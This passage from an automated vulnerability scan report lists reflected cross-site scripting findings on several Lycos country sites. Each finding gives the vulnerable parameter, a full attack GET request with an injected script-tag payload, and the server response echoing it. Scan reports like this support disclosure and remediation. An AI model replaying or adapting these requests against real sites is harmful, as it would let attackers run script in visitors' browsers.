<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagsd09db"><script>alert(1)</script>e65cd00e666&utm_medium=footer&diktfc=775313BECFA5CFF585B17977A57F9005D3533EC60FEB&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416ad"><script>alert(1)</script>1cdec940cf0 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer416ad"><script>alert(1)</script>1cdec940cf0 HTTP/1.1 Host: www.lycos.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839809267; path=/ Date: Mon, 07 Feb 2011 14:52:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:46 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer416ad"><script>alert(1)</script>1cdec940cf0&diktfc=13BEC9559465D05BF490765BBADC44C86E1EABF2B981&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8897f"><script>alert(1)</script>3c4fe2ddaa was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome8897f"><script>alert(1)</script>3c4fe2ddaa&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161724686; path=/ Date: Mon, 07 Feb 2011 14:52:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:44 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16354
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome8897f"><script>alert(1)</script>3c4fe2ddaa&utm_campaign=home_flags&utm_medium=footer&diktfc=C6930F076CCBD10AD85D99FEBD9F3F95D1932C930404&mobile=1"> ...[SNIP]...
1.335. http://www.lycos.com.ar/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.com.ar
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913d2"><script>alert(1)</script>a4aec00e9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?913d2"><script>alert(1)</script>a4aec00e9ec=1 HTTP/1.1 Host: www.lycos.com.ar Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839840848; path=/ Date: Mon, 07 Feb 2011 14:52:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:50 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?913d2"><script>alert(1)</script>a4aec00e9ec=1&diktfc=461B9E311F98225E8AFA9D24E00A757FCF3C56AE098F&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b40"><script>alert(1)</script>e968b5e72c8 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagsb1b40"><script>alert(1)</script>e968b5e72c8&utm_medium=footer HTTP/1.1 Host: www.lycos.com.ar Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161724686; path=/ Date: Mon, 07 Feb 2011 14:52:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagsb1b40"><script>alert(1)</script>e968b5e72c8&utm_medium=footer&diktfc=459469CD9DA845DC7D26E6999C0208941BE950A2732E&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b1d2"><script>alert(1)</script>5989fd6cbf2 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer5b1d2"><script>alert(1)</script>5989fd6cbf2 HTTP/1.1 Host: www.lycos.com.ar Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839841937; path=/ Date: Mon, 07 Feb 2011 14:52:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer5b1d2"><script>alert(1)</script>5989fd6cbf2&diktfc=06A85C1558E3666C9F6AB3E4431873E2532E3D8B4B31&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91551"><script>alert(1)</script>b8f5de7e419 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome91551"><script>alert(1)</script>b8f5de7e419&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.com.ar Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839840848; path=/ Date: Mon, 07 Feb 2011 14:52:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome91551"><script>alert(1)</script>b8f5de7e419&utm_campaign=home_flags&utm_medium=footer&diktfc=C6DE34D9DDF2D6E28122AD6C09F8174E452B1A109B7C&mobile=1"> ...[SNIP]...
1.339. http://www.lycos.com.au/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.com.au
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f37"><script>alert(1)</script>6a7c52fef05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?e4f37"><script>alert(1)</script>6a7c52fef05=1 HTTP/1.1 Host: www.lycos.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839836492; path=/ Date: Mon, 07 Feb 2011 14:52:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:49 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?e4f37"><script>alert(1)</script>6a7c52fef05=1&diktfc=0E94706F762B42F12B534D84F884647A989571305023&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1775"><script>alert(1)</script>fae38d89f83 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagsd1775"><script>alert(1)</script>fae38d89f83&utm_medium=footer HTTP/1.1 Host: www.lycos.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 14:52:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagsd1775"><script>alert(1)</script>fae38d89f83&utm_medium=footer&diktfc=85F4BDB9A12EC4E2BAE3283ED64CE27D0E4557A81D32&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9336a"><script>alert(1)</script>fc8845f9f2c was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer9336a"><script>alert(1)</script>fc8845f9f2c HTTP/1.1 Host: www.lycos.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839839759; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer9336a"><script>alert(1)</script>fc8845f9f2c&diktfc=00E058AE1EEC318DFED223F2170AD5C0D0E286E5C86C&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0521"><script>alert(1)</script>c1e5739e6a0 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomef0521"><script>alert(1)</script>c1e5739e6a0&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839810356; path=/ Date: Mon, 07 Feb 2011 14:52:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshomef0521"><script>alert(1)</script>c1e5739e6a0&utm_campaign=home_flags&utm_medium=footer&diktfc=A5DA3921033C135A0B2E9A63322390F66158D3A0DF77&mobile=1"> ...[SNIP]...
1.343. http://www.lycos.com.br/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.com.br
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fae2"><script>alert(1)</script>e6cd978d538 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?4fae2"><script>alert(1)</script>e6cd978d538=1 HTTP/1.1 Host: www.lycos.com.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839837581; path=/ Date: Mon, 07 Feb 2011 14:52:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="pt"> <head> <title>Lycos</ ...[SNIP]... <a href="/?4fae2"><script>alert(1)</script>e6cd978d538=1&diktfc=4C326178A8C6C2D68FBCBD428A95EBEFEBF8D3397260&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa7a4"><script>alert(1)</script>a2db89cf0ef was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagsfa7a4"><script>alert(1)</script>a2db89cf0ef&utm_medium=footer HTTP/1.1 Host: www.lycos.com.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839840848; path=/ Date: Mon, 07 Feb 2011 14:52:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14027
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="pt"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagsfa7a4"><script>alert(1)</script>a2db89cf0ef&utm_medium=footer&diktfc=BCA6C23D220599E48B7DCD41CECB36DBE9F0053DA89E&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b816f"><script>alert(1)</script>ebc7b83a44a was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerb816f"><script>alert(1)</script>ebc7b83a44a HTTP/1.1 Host: www.lycos.com.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839804911; path=/ Date: Mon, 07 Feb 2011 14:52:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14027
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="pt"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerb816f"><script>alert(1)</script>ebc7b83a44a&diktfc=78848FC9D89CF3B60693D35C25DBED2F81EE80A52883&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2d5f"><script>alert(1)</script>015a94f511 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomef2d5f"><script>alert(1)</script>015a94f511&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.com.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839807089; path=/ Date: Mon, 07 Feb 2011 14:52:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14025
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="pt"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomef2d5f"><script>alert(1)</script>015a94f511&utm_campaign=home_flags&utm_medium=footer&diktfc=84E2DC3F0423AD73A1A6E5A36926BD7913A976F7D844&mobile=1"> ...[SNIP]...
1.347. http://www.lycos.com.co/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.com.co
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80813"><script>alert(1)</script>2016d5a6dc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?80813"><script>alert(1)</script>2016d5a6dc6=1 HTTP/1.1 Host: www.lycos.com.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839839759; path=/ Date: Mon, 07 Feb 2011 14:52:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13862
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?80813"><script>alert(1)</script>2016d5a6dc6=1&diktfc=DBF797FC019145D7A28C9A3BF75FDAD6D03B99A7621F&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7dca"><script>alert(1)</script>96940cba634 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagse7dca"><script>alert(1)</script>96940cba634&utm_medium=footer HTTP/1.1 Host: www.lycos.com.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839801644; path=/ Date: Mon, 07 Feb 2011 14:52:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagse7dca"><script>alert(1)</script>96940cba634&utm_medium=footer&diktfc=AD739F051FDE2E189F01AA26148A6888E3A6773F58EC&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3105a"><script>alert(1)</script>cd382cacad6 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer3105a"><script>alert(1)</script>cd382cacad6 HTTP/1.1 Host: www.lycos.com.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161729042; path=/ Date: Mon, 07 Feb 2011 14:52:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13990
